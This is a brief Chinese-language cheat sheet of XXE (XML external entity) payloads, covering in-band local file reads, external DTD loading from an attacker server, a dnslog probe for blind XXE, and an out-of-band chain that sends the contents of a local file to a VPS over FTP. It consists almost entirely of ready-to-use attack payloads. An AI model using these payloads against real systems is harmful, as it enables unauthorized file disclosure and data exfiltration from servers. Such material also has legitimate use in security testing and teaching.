分为有回显和无回显
1 有回显
(1)读取本地文件
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cat [<!ENTITY cat SYSTEM "file:///c:/123.txt" >]>
<a>&cat;</a>
文件位置及内容
(2) 服务器外部dtd文档
暂时无法实现
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cat [<!ENTITY cat SYSTEM "http://29.189.89.300:8989/cat.dtd" >]>
<a>&cat;</a>
dtd文档的内容:
<!ENTITY cat SYSTEM "file:///c:/123.txt">
(3)通过DTD外部实体声明引入外部实体声明
暂时无法实现
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cat [<!ENTITY % cat SYSTEM "http://29.189.89.300:8989/cat.dtd" > %cat;]>
<a>&cat;</a>
文档内容
//dtd文件内容 :<!ENTITY cat SYSTEM "file:///c:/123.txt">
可以实现
2 无回显
(1)dnslog测试
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ENTITY % remote SYSTEM "http://vfmmco.ceye.io">
%remote;]>
<root/>
(2)读文件
vps:
%cat;
参考:<!ENTITY % cat "<!ENTITY % send SYSTEM 'ftp://vps的地址:2121/%file;'>">
%cat;
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cat [
<!ENTITY % file SYSTEM "file:///c:/123.txt">
<!ENTITY % dtd SYSTEM "http://29.189.89.300:8989/cat.dtd">
%dtd;
%send;
]>